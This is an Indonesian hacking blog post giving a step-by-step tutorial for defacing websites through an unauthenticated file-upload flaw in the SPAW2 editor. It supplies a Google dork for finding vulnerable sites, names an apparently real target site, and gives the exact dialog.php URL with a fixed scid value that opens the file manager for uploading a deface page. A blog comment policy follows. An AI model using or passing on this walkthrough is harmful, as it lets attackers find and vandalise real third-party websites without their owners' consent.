Deface Spaw Upload Vulnerably


Banyak exploit yang dapat mengupload file secara langsung, ok kali ini kami memberi tutorial sekaligus cara menggunakan exploit itu.

dorknya :
inurl:”spaw2/dialogs/” OR  inurl:”spaw2/uploads/files/” 

Jika sudah dapat targetny, contoh targetnya :
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf

bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf

GANTI DENGAN 

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

MAKA HASILNYA SEPERTI INI

http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  • Akan tampil halaman untuk upload File.
  • Ganti menjadi files pada lokasi penyimpanan.
  • Browse file design Deface kamu, & upload.
  • Apabila file sukses diupload.akan terlihat file uploadtan tadi…
thx to code scurity

No comments:

Post a Comment

Kebijakan berkomentar akan dihapus, jika tidak sesuai dengan aturan dibawah ini, Demi kenyamanan kita bersama :

» Menggunakan bahasa yang tidak sopan (Sara, Pornografi, Menyinggung)
» Duplikat komentar
» Komentar menautkan link secara langsung
» Komentar tidak berkaitan dengan artikel
» Judul Komentar Berupa Promosi

Bila Anda punya nama atau blog gunakan komentar sebagai "Name/ URL".

Sebelumnya vito minta maaf yg sebesar"nya jika komentar anda belum sempat dibales. ^^

Followers

Lagi Naik Daun